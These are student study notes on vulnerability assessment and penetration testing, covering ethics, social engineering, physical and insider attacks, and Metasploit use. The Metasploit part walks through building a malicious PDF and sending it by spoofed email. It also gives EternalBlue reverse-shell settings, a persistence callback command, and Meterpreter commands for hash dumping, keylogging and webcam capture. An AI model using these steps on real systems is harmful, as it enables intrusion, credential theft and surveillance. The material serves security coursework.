Vapt Notes
Uploaded by
Sai TejaswiniVapt Notes
Uploaded by
Sai TejaswinilOMoARcPSD|59458673
VAPT short notes jnuth - Vulnerability assessment and
penetration testing
Cyber Security (Jawaharlal Nehru Technological University, Hyderabad)
Scan to open on Studocu
Studocu is not sponsored or endorsed by any college or university
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
VULNERABILITY ASSESSMENT AND
PENETRATION TESTING
UNIT -1
Ethics of Ethical Hacking:
The ethics of ethical hacking revolve around the principles of responsibility, consent, transparency,
and the overall goal of improving security rather than exploiting weaknesses. Here are some key
ethical considerations for ethical hackers:
1. Permission and Authorization
Consent is fundamental. Ethical hackers must always obtain explicit permission from the owner of the
system, network, or application they are testing.
Unauthorized access to systems, even if the intention is to find vulnerabilities, is illegal and unethical. This is
why ethical hackers should only work within the boundaries set by a formal agreement, such as a "Contract
for Penetration Testing" or a "Bug Bounty" agreement.
2. Respecting Privacy
Ethical hackers must protect sensitive information during their work. If they encounter personal or private
data, they must ensure that it is not exposed, misused, or shared with unauthorized parties.
They should also minimize data collection to what's necessary for their security testing.
3. Avoiding Harm
The goal of ethical hacking is to identify weaknesses and vulnerabilities so that they can be fixed, not to
exploit them for personal gain or cause damage to systems or people.
Ethical hackers should not create risks, disrupt services, or damage data while testing. All activities should be
aimed at improving security, not creating additional problems.
4. Transparency and Reporting
Ethical hackers should disclose vulnerabilities they find to the system owner in a responsible way, providing
enough information for the organization to understand the issue and take action.
The reporting process should be clear, precise, and timely. Hackers should work closely with organizations to
address vulnerabilities, ideally in a way that doesn't put systems at risk by being publicly disclosed before a
fix is available.
5. Professional Integrity
Ethical hackers must maintain high standards of professionalism and integrity. This includes adhering to
codes of conduct set by organizations like (ISC)² or the EC-Council.
ARJUNSAI
Cyber security 1
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
They should avoid conflicts of interest and refrain from hacking for personal profit or outside the scope of
their role.
6. Accountability and Legal Compliance
Ethical hackers are responsible for ensuring their actions are legal. They must abide by all applicable laws
and regulations (such as data protection laws, cybersecurity regulations, and others).
They should also ensure that their actions do not violate any terms of service or contracts they may have
with clients.
7. Continuous Learning and Adaptation
Ethical hacking is an evolving field, and ethical hackers should stay up to date with new threats, tools, and
methodologies. They should constantly improve their skills while maintaining a strong ethical foundation.
Why You Need to Understand Your Enemy's Tactics:
o Ethical hackers are hired to simulate cyberattacks and assess security measures.
Understanding an adversary’s tactics is crucial for identifying weaknesses in security
systems.
o Tactics of Attackers:
▪ Reconnaissance: Collecting information about a target (network scanning,
social engineering, OSINT – Open Source Intelligence).
▪ Exploitation: Taking advantage of system vulnerabilities to gain unauthorized
access.
▪ Persistence: Maintaining access to the system for further exploitation.
▪ Exfiltration: Stealing valuable data or information.
▪ Covering Tracks: Hiding the traces of the attack to avoid detection.
o By knowing how attackers think and operate, ethical hackers can better anticipate
potential threats and test an organization's defences.
Recognizing the Grey Areas in Security:
o Ethical hacking walks a fine line between ethical behaviour and potentially illegal
activities. It is important to understand the boundaries between legal and illegal
hacking:
▪ Legal: Hacking performed with written consent, under predefined rules, and
within agreed-upon boundaries.
ARJUNSAI
Cyber security 2
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
▪ Illegal: Unauthorized hacking without permission, even if the intent is to expose
vulnerabilities for security improvement.
o The grey areas often stem from unclear rules or policies that can lead to ethical
dilemmas during penetration testing. Ethical hackers must always:
▪ Obtain written consent (Rules of Engagement) before conducting any security
assessments.
▪ Stay within the predefined scope and avoid engaging in activities that might
harm the organization.
2. Vulnerability Assessment and Penetration Testing:
o Vulnerability Assessment: This is the process of identifying, quantifying, and
prioritizing vulnerabilities in a system. Tools like vulnerability scanners (e.g., Nessus,
OpenVAS) are commonly used to detect known weaknesses in software, systems, and
network configurations.
ARJUNSAI
Cyber security 3
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Penetration Testing: A penetration test is a simulated attack on a system or network
to identify vulnerabilities that could be exploited by a real-world attacker.
▪ Key Differences:
▪ Vulnerability Assessment: Focuses on identifying vulnerabilities,
often without exploiting them.
▪ Penetration Testing: Focuses on actively exploiting vulnerabilities to
determine the level of risk and possible consequences of an attack.
o Both activities are essential for strengthening an organization’s cybersecurity defences.
ARJUNSAI
Cyber security 4
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Differences between Vulnerability Assessment and Penetration testing :
Aspect Vulnerability Assessment Penetration Testing
Objective Identify and catalog vulnerabilities. Exploit vulnerabilities to assess impact.
Scope Broad and comprehensive. Focused and targeted.
Automated scanning with some manual Combines automated tools with manual
Methodology
verification. techniques.
Intrusiveness Non-intrusive. Intrusive (simulates real attacks).
List of vulnerabilities with severity Exploited vulnerabilities and attack
Output
ratings. scenarios.
Performed periodically or after major
Frequency Regularly performed (e.g., quarterly).
changes.
Skill Level Moderate (can be performed by IT High (requires skilled penetration
Required staff). testers).
Penetration Testing and Tools
1. Penetration Testing:
o Definition: Penetration testing is the practice of simulating real-world attacks on
systems to uncover vulnerabilities that could be exploited by malicious hackers.
o Pen Test Phases:
1. Planning and Preparation: Define the scope of the test, gather information,
and establish engagement rules.
2. Reconnaissance: Gather information (e.g., IP addresses, domain names) to
build a profile of the target.
3. Scanning and Enumeration: Use automated tools to identify open ports,
services, and vulnerabilities in the target systems.
4. Exploitation: Actively exploit identified vulnerabilities to gain unauthorized
access.
5. Post-Exploitation: Assess the impact of the exploit and try to escalate
privileges or maintain access.
ARJUNSAI
Cyber security 5
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
6. Reporting: Document findings, provide remediation advice, and share
recommendations for strengthening security.
o Penetration Testing Tools:
▪ Nmap: A popular network scanner used to discover hosts and services running
on a network.
▪ Burp Suite: An integrated platform used for web application security testing. It
can find vulnerabilities such as SQL Injection, XSS, and more.
▪ Metasploit: A framework used for creating and executing exploits against
vulnerable systems.
▪ Wireshark: A network protocol analyser that captures and inspects packets on
the network to identify potential security weaknesses.
▪ Nikto: A web server scanner that detects vulnerabilities like outdated software,
configuration issues, and common security flaws.
o Goals of Penetration Testing:
▪ Assess Security: Identify vulnerabilities in an environment and test the
effectiveness of current defences.
▪ Minimize Risks: Proactively identify potential attack vectors and mitigate risks
before real attackers exploit them.
▪ Provide Recommendations: After testing, provide the organization with a
comprehensive report and actionable suggestions for improving security.
ARJUNSAI
Cyber security 6
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Social Engineering Attacks:
1. How a Social Engineering Attack Works:
o Definition: Social engineering is the manipulation of individuals into divulging
confidential information or performing actions that compromise security. Social
engineers exploit human behaviour rather than technical vulnerabilities.
o Psychological Manipulation: Attackers use tactics such as urgency, authority, flattery,
or fear to manipulate their targets into providing sensitive information or access to
secure systems.
▪ Example: An attacker might impersonate a company's IT technician and ask an
employee to reset their password or provide login credentials.
o Techniques:
▪ Pretexting: The attacker creates a fabricated story (pretext) to obtain
information from the victim. For example, pretending to be from the IT
department to gather sensitive details.
▪ Phishing: Sending deceptive emails that appear to come from legitimate
sources (banks, online services) to trick the target into clicking on malicious
links or sharing credentials.
ARJUNSAI
Cyber security 7
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
▪ Spear Phishing: A more targeted form of phishing, where attackers customize
their messages to specific individuals or organizations.
▪ Baiting: Offering something appealing (e.g., free software) to lure the victim
into downloading malware or providing sensitive information.
▪ Quizzes and Surveys: Attackers create fake quizzes or surveys to gather
personal details or answers to security questions.
2. Conducting a Social Engineering Attack:
o Gathering Information: Social engineers often begin by gathering public information
about their target (using OSINT tools, social media profiles, etc.) to build a profile that
helps in crafting convincing attacks.
o Establishing Trust: Attackers attempt to establish rapport or authority, making the
victim believe they are legitimate.
o Exploiting the Trust: Once trust is established, the attacker may ask for sensitive
information or attempt to breach security measures (e.g., accessing login credentials,
bypassing security controls).
o Executing the Attack: The attacker may use the acquired information to gain
unauthorized access to systems or steal sensitive data.
Preparing Yourself for Face-to-Face Attacks
1. Recognizing Face-to-Face Social Engineering Attacks:
o Attack Types: These include impersonating company employees, contractors, or
delivery personnel to physically gain access to restricted areas.
▪ Tailgating: Following someone into a restricted area without proper
authorization.
▪ Impersonation: Pretending to be someone with legitimate access to a secure
area, such as maintenance staff or a visitor.
o Situational Awareness: Employees should be aware of their surroundings and
suspicious individuals who may try to gain unauthorized access or extract sensitive
information.
2. Defending Against Face-to-Face Attacks:
ARJUNSAI
Cyber security 8
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Access Control: Ensure that employees follow proper access protocols, such as
requiring visitors to sign in, wearing badges, and accompanying them at all times in
secure areas.
o Physical Security: Install physical barriers (e.g., security doors, biometric
authentication) to prevent unauthorized access to sensitive areas.
o Security Training: Provide staff with security awareness training to recognize
potential social engineering tactics and report suspicious behaviour.
Defending Against Social Engineering Attacks
1. Educating Employees:
o Employees should be regularly trained on recognizing social engineering tactics such
as phishing emails, phone scams, and physical impersonations.
o Key Awareness Areas:
▪ Do not share personal information or credentials over the phone or email.
▪ Verify requests from unknown sources before taking action.
▪ Recognize red flags such as urgency or too-good-to-be-true offers.
2. Implementing Multi-Factor Authentication (MFA):
o MFA adds an extra layer of security, making it harder for attackers to gain access even
if they acquire a user’s credentials through social engineering.
3. Incident Response:
o Establish an incident response plan that includes steps for handling and reporting
suspected social engineering attacks. This will help mitigate the damage caused by such
attacks.
o Example: If an employee suspects they’ve been targeted by a phishing email, they
should report it immediately to the IT or security team for investigation.
ARJUNSAI
Cyber security 9
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
UNIT 2
Physical Penetration Attacks : Physical penetration attacks involve exploiting physical access to a
facility, system, or device in order to gain unauthorized access, gather sensitive information, or compromise
security systems. These attacks can bypass many of the defenses that focus on digital security, so they highlight
the importance of a comprehensive security strategy that combines both physical and cybersecurity
measures.
Why a Physical Penetration Is Important:
Physical penetration is an important aspect of security testing because it reveals vulnerabilities that
digital or cybersecurity defenses might not be able to address. Even with the most sophisticated
firewalls, encryption, and network security protocols, attackers can bypass these layers if they can
physically access a location or system. Here's why physical penetration is critical:
1. Bypassing Digital Security
Physical access can bypass digital defenses like firewalls, antivirus programs, and encryption methods. If an
attacker can physically access a device, network, or server, they can tamper with it directly, potentially
extracting sensitive information or compromising systems without triggering digital security alerts.
2. Testing Real-World Security
Physical security is just as important as cybersecurity. A physical penetration test simulates real-world
attacks that might involve social engineering, lockpicking, or hardware tampering. These kinds of tests assess
how well a company's physical defenses—such as access control systems, locks, biometric scanners, or
security personnel—can withstand unauthorized access.
ARJUNSAI
Cyber security 10
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
It helps identify any gaps or weaknesses in physical security measures that could otherwise be overlooked.
3. Identifying Human Weaknesses (Social Engineering)
Human error or lack of awareness is a major security vulnerability. Attackers can exploit weaknesses like
tailgating, impersonation, or social engineering to gain physical access to secure areas or systems. A
physical penetration test can uncover how employees respond to these attacks and whether they follow
proper security protocols.
For instance, attackers might gain unauthorized access by posing as legitimate contractors or delivery
personnel, which is something digital security systems can't prevent.
4. Safeguarding Sensitive Information
Physical access allows attackers to potentially steal, modify, or destroy sensitive information. Devices like
USB drives, external hard drives, and other hardware can store large amounts of data. If an attacker can
gain physical access to these devices or systems, they can bypass all other security layers and directly obtain
valuable information.
A physical penetration test ensures that these devices and sensitive data are protected from unauthorized
access and theft.
5. Testing Infrastructure Vulnerabilities
Physical penetration attacks can expose vulnerabilities in a company’s infrastructure, such as network
cables, power systems, and CCTV cameras. An attacker who gains physical access to these critical
components could manipulate the system to disrupt business operations or access internal networks.
This type of test can help organizations identify weaknesses in their physical infrastructure and take
measures to secure them, such as reinforcing data centers or improving access controls to critical areas.
6. Mitigating Insider Threats
While many security efforts focus on external threats, insiders—employees, contractors, or partners—can be
a significant risk. A physical penetration test can uncover how vulnerable an organization is to insider
threats, whether through negligence or malicious intent.
Ensuring that unauthorized individuals cannot physically access sensitive areas or systems helps prevent
both accidental and intentional data breaches.
7. Compliance with Regulations and Standards
Many industries and regulatory bodies require physical security testing as part of compliance standards. For
example, standards like ISO 27001 or regulations like PCI-DSS (Payment Card Industry Data Security
Standard) require organizations to test their physical security controls to ensure they meet certain criteria.
Regular physical penetration testing helps demonstrate compliance and reduce the risk of legal or financial
penalties due to weak physical security.
8. Revealing Blind Spots in Security Planning
Physical penetration testing can reveal areas of the organization's security strategy that may have been
overlooked or underdeveloped. For example, an employee may have left an unlocked laptop in a public
space, or a security guard might not be properly verifying credentials for contractors. Identifying these blind
spots helps improve overall security posture.
ARJUNSAI
Cyber security 11
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
9. Mitigating Business Risk
Attacks that target physical assets, like company data centers, offices, or equipment, can have devastating
consequences for an organization. These attacks may lead to data breaches, financial loss, or damage to a
company's reputation. Testing physical security systems helps mitigate the risk of these attacks.
By identifying and addressing physical vulnerabilities, organizations can reduce the likelihood of business
disruptions and financial losses caused by physical breaches.
10. Improving Security Culture
Conducting physical penetration tests raises awareness about physical security among employees and other
stakeholders. It reinforces the idea that security is not just about IT systems but also about physical access to
critical areas.
This can foster a security-conscious culture, where employees are more vigilant about adhering to security
protocols, such as using badges, locking doors, and avoiding unescorted visitors.
o Why It Matters: Physical penetration is a critical aspect of testing security because,
regardless of how robust a system’s digital defenses are, an attacker with physical
access to a building can easily bypass network and digital security. Physical penetration
attacks are often seen as the easiest way for attackers to infiltrate systems.
▪ Example: An attacker could plant malware on an internal network by physically
plugging in a malicious USB drive or device into a workstation in the
company’s office.
Conducting a Physical Penetration:
o Steps Involved:
1. Reconnaissance: The attacker first performs a physical reconnaissance of the
facility, often observing the site for potential weaknesses such as entry points,
employees’ habits, and access points that may be overlooked.
2. Social Engineering: The attacker may use social engineering tactics such as
impersonation, where they pose as an employee, vendor, or maintenance staff
to gain access to restricted areas.
3. Tailgating: One of the most common methods used in physical penetration.
Tailgating occurs when an attacker follows a legitimate employee into a secured
area without proper authentication.
ARJUNSAI
Cyber security 12
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
4. Exploitation: Once inside, the attacker may install a device (e.g., a rogue
wireless access point) to exploit network vulnerabilities or directly steal
sensitive data.
5. Persistence: Attackers may use various tactics to maintain their access to the
organization’s network, such as planting hidden devices or setting up remote
access tools on internal machines.
Common Ways Into a Building:
o Weak Access Control Systems: Poorly secured doors, windows, and entry points are
common weaknesses that attackers exploit. This could be due to lax enforcement of
security policies or outdated security systems.
o Tailgating: The attacker simply follows an authorized person through an entry point,
bypassing physical security controls.
o Impersonation: Attackers may impersonate employees, contractors, or service
providers to gain access to buildings.
o Locked/Unmonitored Rooms: Identifying rooms or areas where security is low, such
as data centers, server rooms, or restricted office spaces.
Defending Against Physical Penetrations:
o Access Control: Organizations should implement strict access controls like key cards,
biometric authentication, and multi-factor access systems.
o Security Guards: The use of trained security personnel and access management
systems that can authenticate individuals before granting access to restricted areas.
o Surveillance Systems: CCTV cameras can help monitor sensitive areas and detect
suspicious activities.
o Employee Training: Employees should be trained to recognize social engineering
tactics and the risks of tailgating and unauthorized physical access.
ARJUNSAI
Cyber security 13
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Insider Attacks:
Definition of Insider Attacks:
o Insider Attack: An insider attack refers to a security breach committed by someone
within the organization, such as an employee, contractor, or business partner who has
access to critical systems and sensitive data. Unlike external attackers, insiders have
knowledge of the organization’s systems and are often harder to detect.
o Motivation: Insider attacks can occur for various reasons, including personal
grievances, financial motivation, or espionage. Disgruntled employees or those with
high levels of access to sensitive data can cause significant harm.
Conducting an Insider Attack:
o Exploitation of Trust: Insiders already have authorized access, so their actions can go
unnoticed. An insider with elevated privileges can steal data, install malware, or
exfiltrate sensitive information.
o Example of Insider Attack: An employee with access to financial data might steal
company funds or leak sensitive intellectual property to competitors.
o Bypassing Security: Insiders may circumvent security mechanisms such as firewalls,
antivirus software, and encryption by leveraging their knowledge of the organization’s
internal network structure.
ARJUNSAI
Cyber security 14
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Defending Against Insider Attacks:
o Least Privilege: Users should be given the minimum level of access required to
perform their jobs. This limits the potential damage an insider can cause if their account
is compromised or they act maliciously.
o Employee Monitoring: Regular monitoring of employee activities, including login
history, file access logs, and email communication, can help identify potential insider
threats.
o Behavioural Analysis: Organizations can deploy systems that track abnormal
behaviour patterns, such as unauthorized access to sensitive data or unusual activity at
odd hours.
o Access Management: Limiting access to critical systems and implementing strong
authentication protocols can prevent unauthorized access from insiders. Regular audits
of access controls should be conducted.
Metasploit: The Big Picture
ARJUNSAI
Cyber security 15
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
What is Metasploit?
o Metasploit Framework: The Metasploit Framework is an open-source penetration
testing tool that helps ethical hackers find, exploit, and validate vulnerabilities in
systems. It is widely used by penetration testers to automate the process of exploiting
known vulnerabilities and conducting security assessments.
o Key Features:
▪ Exploit Modules: Metasploit comes with a wide variety of modules to exploit
different types of vulnerabilities.
▪ Payloads: Once an exploit is successful, payloads can be used to gain control
over the target system.
▪ Auxiliary Modules: These modules can be used for a range of tasks such as
scanning, enumeration, and denial of service (DoS) attacks.
▪ Post-Exploitation Modules: After compromising a target, Metasploit can help
maintain control of the system, gather information, or pivot into other systems
within the network.
Getting Metasploit:
Installing Metasploit on Linux (Kali Linux, Ubuntu, etc.)
Metasploit is commonly used on Kali Linux (a distribution designed for penetration testing), but
it can be installed on other Linux distributions like Ubuntu as well.
On Kali Linux (Preinstalled with Kali):
Kali Linux typically comes with Metasploit already pre-installed, but in case it is missing or needs
an update, follow these steps:
1. Update Kali Linux repositories: “sudo apt update” “sudo apt upgrade”
2. Install Metasploit: “sudo apt install metasploit-framework”
3. Start Metasploit: To launch the Metasploit console, use the following command
“msfconsole”
On Ubuntu (or other Debian-based distros):
ARJUNSAI
Cyber security 16
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
1. Add the Metasploit repository: First, add the Metasploit repository to your system's package
manager: “ curl https://raw.githubusercontent.com/rapid7/metasploit-
framework/master/docker/docker-install.sh | sudo bash “
2. Install dependencies: Ensure you have all required dependencies: “ sudo apt install -y
build-essential libpq-dev libpcap-dev libsqlite3-dev “
3. Install Metasploit: Download and install Metasploit via the package manager: “sudo apt
install metasploit-framework “
4. Start Metasploit: Launch Metasploit by running : “ msfconsole”
Installing Metasploit on macOS:
1. Install Homebrew (if not installed): Homebrew is a package manager for macOS that
simplifies installing software.
2. Install Metasploit using Homebrew: Once Homebrew is installed, you can easily install
Metasploit with: “brew install metasploit”
3. Start Metasploit: After installation, launch Metasploit with: “msfconsole”
Installing Metasploit on Windows:
Windows users can install Metasploit using the Metasploit Community installer or via the
Windows Subsystem for Linux (WSL) if using a Linux-like environment.
1. Using Metasploit Community Installer:
o Download the Metasploit installer from the official website: Metasploit Download
Page.
o Run the downloaded .exe installer and follow the instructions.
o Once installed, you can launch Metasploit from the Start menu.
2. Using Windows Subsystem for Linux (WSL):
o First, enable WSL if it's not already enabled by running: wsl –install
o Then, set up Ubuntu or another Linux distribution from the Microsoft Store.
o After setting up WSL, follow the installation steps for Linux (as described in the Linux
section above).
3. Start Metasploit: Open a WSL terminal or Metasploit Command Prompt (if using the Community
version) and run: “msfconsole”
By setting up Metasploit on your system, you gain access to a comprehensive suite of exploits, payloads, and
tools that enable effective penetration testing and vulnerability assessments. With its extensive database of
exploits, its flexibility, and the capability to develop custom exploits, Metasploit is a must-have tool in any
cybersecurity toolkit.
ARJUNSAI
Cyber security 17
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
Using the Metasploit Console to Launch Exploits:
o msfconsole: The Metasploit Console is the primary command-line interface for
interacting with the Metasploit Framework. Through this interface, users can search for
exploits, configure payloads, and launch attacks against target systems.
o By setting up Metasploit on your system, you gain access to a comprehensive suite of exploits,
payloads, and tools that enable effective penetration testing and vulnerability assessments.
With its extensive database of exploits, its flexibility, and the capability to develop custom
exploits, Metasploit is a must-have tool in any cybersecurity toolkit.
o Use an Exploit: Once you find an exploit, you can use it with the use command. For example,
if you want to use an exploit for a vulnerable service:
o Show Options: After selecting an exploit, you can see its options
o Set Options: Set the necessary parameters (such as target IP and port) using the set
command
o Select a Payload: After selecting an exploit, you need to select a payload (which is the code
that runs on the target system once the exploit succeeds)
o Execute the Exploit: Finally, you can execute the exploit by typing:exploit
▪ Example: To search for an exploit for a specific vulnerability in the Metasploit
framework, the user can type search <vulnerability_name>.
Exploiting Client-Side Vulnerabilities with Metasploit:
o Client-Side Attacks: These are attacks that target the user rather than the system itself.
For example, an attacker may exploit vulnerabilities in a web browser or email client
to gain access to a system.
▪ Example: Exploiting a browser vulnerability to deliver a malicious payload via
a malicious website or email attachment.
o Metasploit includes modules that can be used for such attacks, such as
browser_autopwn for exploiting Internet Explorer vulnerabilities.
➢ We start off by loading our msfconsole. After we are loaded we want to
create a malicious PDF that will give the victim a sense of security in
opening it. To do that, it must appear legit, have a title that is realistic, and not
be flagged by anti-virus or other security alert software.
ARJUNSAI
Cyber security 18
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
➢ We are going to be using the Adobe Reader ‘util.printf()’ JavaScript
Function Stack Buffer Overflow Vulnerability. Here the steps :
1. So we start by creating our malicious PDF file for use in this client side exploit.
2. Once we have all the options set the way we want, we run exploit to create
our malicious file.
msf exploit(adobe_utilprintf) > exploit
[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...
[*] BestComputers-UpgradeInstructions.pdf stored at /root/.msf4/local/BestComputers-
UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) >
3. So we can see that our pdf file was created in a sub-directory of where we are.
So let’s copy it to our /tmp directory so it is easier to locate later on in our
exploit. Before we send the malicious file to our victim we need to set up a
listener to capture this reverse connection. We will use msfconsole to set up our
multi handler listener.
4. Now that our listener is waiting to receive its malicious payload we have to
deliver this payload to the victim and since in our information gathering we
obtained the email address of the IT Department we will use a handy little script
called sendEmail to deliver this payload to the victim.
root@kali:~# sendEmail -t [email protected] -f [email protected] -s
192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-
UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
ARJUNSAI
Cyber security 19
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
IT Dept,
We are sending this important file to all our customers. It contains very important
instructions for upgrading and securing your software. Please read and let us know
if you have any problems.
Sincerely,
Best Computers Tech Support
Aug 24 17:32:51 kali sendEmail[13144]: Message input complete.
Aug 24 17:32:51 kali sendEmail[13144]: Email was sent successfully!
5. As we can see here, the script allows us to put any FROM (-f) address, any TO
(-t) address, any SMTP (-s) server as well as Titles (-u) and our malicious
attachment (-a). Once we do all that and press enter we can type any message
we want, then press CTRL+D and this will send the email out to the victim.
6. Now on the victim’s machine, our IT Department employee is getting in for the
day and logging into his computer to check his email. He sees the very
important document and copies it to his desktop as he always does, so he can
scan this with his favorite anti-virus program.
7. We now have a shell on their computer through a malicious PDF client side
exploit. Of course what would be wise at this point is to move the shell to a
different process, so when they kill Adobe we don’t lose our shell. Then obtain
system info, start a key logger and continue exploiting the network.
Penetration Testing with Metasploit’s Meterpreter:
o Meterpreter is an advanced, dynamically extensible payload within Metasploit that
allows penetration testers to maintain control over a compromised system after
exploitation.
▪ Features of Meterpreter:
ARJUNSAI
Cyber security 20
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
▪ Allows for file system manipulation, process management,
keylogging, network sniffing, and more.
▪ Provides reverse shell capabilities to interact with the target system.
▪ No permanent files: Meterpreter operates in memory and doesn’t leave
traces on the target machine's file system, making it harder to detect.
▪ Full control: It provides full interaction with the compromised system,
from taking screenshots to dumping credentials and controlling
webcams.
▪ Extensible: Meterpreter supports the installation of additional modules
that add more functionality, such as keylogging and network sniffing.
Setting Up and Using Meterpreter in Metasploit:
First, you need to select an exploit and choose the Meterpreter payload.
1. Start Metasploit Console: msfconsole.
2. Search for an Exploit: Use the search command to find a specific exploit. For example, if you're
targeting a specific version of Windows: search ms17_010 .This will search for the EternalBlue exploit,
which targets a known vulnerability in Windows SMBv1.
3. Select the Exploit: Once you find the exploit, use the use command to load it. For example: use
exploit/windows/smb/ms17_010_eternalblue
4. Set the Target and Payload: Before launching the exploit, set the target (the victim’s IP address) and
specify the Meterpreter payload. For example:
set RHOSTS 192.168.1.105
set RPORT 445
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100 # Attacker's IP
set LPORT 4444 # Attacker's listening port
5. Run the Exploit: After setting everything up, you can run the exploit: exploit
ARJUNSAI
Cyber security 21
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
6. If the exploit is successful, it will establish a reverse connection to your system and open a
Meterpreter session
Meterpreter Commands and Functionality:
Once you have an active Meterpreter session, you can begin using the available commands to
interact with the compromised machine. Here are some common Meterpreter commands and their
functionalities.
Commands:
❖ sysinfo: Displays information about the compromised system, including the operating system version,
architecture, and hostname
❖ pwd: Shows the current working directory on the target system
❖ cd: Changes the working directory on the target system.
❖ upload: Uploads a file from your local machine to the target system.
❖ getuid: Displays the user ID of the currently authenticated user on the target system.
❖ screenshot: Captures a screenshot of the target system’s screen.
❖ webcam_snap: Takes a snapshot using the target system's webcam
❖ keyscan_start: Starts keylogging on the target system to capture keystrokes.
❖ keyscan_dump: Displays the captured keystrokes (after keylogging has been started).
❖ kill: Kills a process on the target system by its PID (Process ID).
❖ hashdump: Dumps the password hashes from the target system, often used for cracking
Windows login credentials.
❖ route: Adds routes to the target system to enable pivoting and access to other networks.
Automating and Scripting Metasploit:
o Metasploit Automation: The Metasploit Framework includes scripting capabilities to
automate common penetration testing tasks. It can be used to automate exploitation,
payload delivery, and post-exploitation actions.
ARJUNSAI
Cyber security 22
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
o Examples: Penetration testers can write scripts in Ruby (Metasploit is written in Ruby)
to automate attacks or interact with specific modules.
➢ Metasploit provides an API (Application Programming Interface) that allows you to
interact programmatically with the Metasploit Framework. The Metasploit RPC (Remote
Procedure Call) API allows users to connect to and control Metasploit from external
scripts and tools.
➢ Using the Metasploit API : The Metasploit API is typically used for automating
penetration testing tasks from a custom script (usually written in Python, Ruby, or another
language). This allows integration of Metasploit with other tools, platforms, and
workflows.
Going Further with Metasploit:
❖ . Creating Custom Modules
Metasploit offers an incredibly flexible architecture that allows penetration testers to create their own
custom modules. These can be exploits, auxiliary modules, post-exploitation modules, or even
custom payloads. Creating custom modules can help you automate specific tasks, exploit unknown
vulnerabilities, or conduct unique attacks that are not covered by the existing Metasploit modules.
Types of Custom Modules
• Exploits: Custom exploits can be created for vulnerabilities not yet covered by Metasploit.
Exploits define how to gain control over a system.
• Payloads: Payloads are the code that runs on a compromised system. You can create custom
payloads to meet specific needs.
• Auxiliary Modules: These are used for non-exploitative tasks such as scanning, brute-
forcing, or fuzzing.
• Post-Exploitation Modules: These modules are used after a system has been compromised
to gather further information, escalate privileges, or move laterally within the network.
ARJUNSAI
Cyber security 23
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
❖ Advanced Post-Exploitation Features
Once you have successfully exploited a system and deployed a payload, Metasploit's post-exploitation
modules come into play. These modules are designed to allow you to maintain access, gather further
information, escalate privileges, and move laterally through the network.
❖ Using Meterpreter for Post-Exploitation
Meterpreter is a highly flexible and dynamic payload that provides an interactive command-line
interface for the compromised system. You can use it to:
• Escalate Privileges: If you gain low-level access to a system, you can attempt to escalate your
privileges to administrator or root.
o Example: getsystem (attempts to escalate privileges to SYSTEM on Windows).
• Network Pivoting: Pivot through the compromised system to access other internal networks
or machines that would otherwise be unreachable.
o Example: route add (adds routes for pivoting to other subnets).
• Credential Dumping: You can extract passwords, hashes, and other sensitive data from the
compromised system.
o Example: hashdump (dumps Windows password hashes).
• Keylogging: Capture keystrokes on the target machine to gather sensitive data (e.g., passwords,
security codes).
o Example: keyscan_start (starts keylogging), keyscan_dump (displays captured
keystrokes).
• Webcam and Screenshot Capture: Use Meterpreter’s built-in commands to take screenshots
or even capture webcam images from the target machine.
o Example: webcam_snap (takes a snapshot using the target’s webcam).
• Persistence: Set up persistence to ensure you maintain access to the compromised system even
after reboots or cleanups.
o Example: run persistence -X -i 10 -p 4444 -r 192.168.1.100
❖ Creating Custom Exploit Payloads
Sometimes the existing Metasploit payloads may not meet the needs of your specific attack scenario.
In such cases, you can create custom exploit payloads.
ARJUNSAI
Cyber security 24
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
❖ Advanced Techniques: The Metasploit Framework can be used for advanced penetration
testing tasks such as pivoting (attacking other systems behind firewalls) and escalating
privileges to gain higher levels of access in a compromised system.
❖ Learning Metasploit: Penetration testers should constantly update their knowledge of
Metasploit modules, as the tool evolves with new exploits and techniques.
ARJUNSAI
Cyber security 25
Downloaded by Sai Tejaswini ([email protected])
lOMoARcPSD|59458673
UNIT 3
Managing a Penetration Test:
Managing a penetration test involves overseeing the planning, execution, and post-test analysis to
ensure that the assessment is thorough, effective, and ethical. Penetration testing, also known as
ethical hacking, aims to identify vulnerabilities and weaknesses in a system, network, or application
so that they can be fixed before malicious attackers exploit them.
Here’s a step-by-step guide to managing a penetration test:
1. Define Objectives and Scope
Clarify Goals: Clearly define what you want to achieve with the penetration test. Are you testing a specific
application, network, or physical infrastructure? Are you testing for a particular type of vulnerability (e.g.,
web application vulnerabilities, social engineering, etc.)?
Set Boundaries: Determine the scope of the test, such as which systems, applications, and networks should
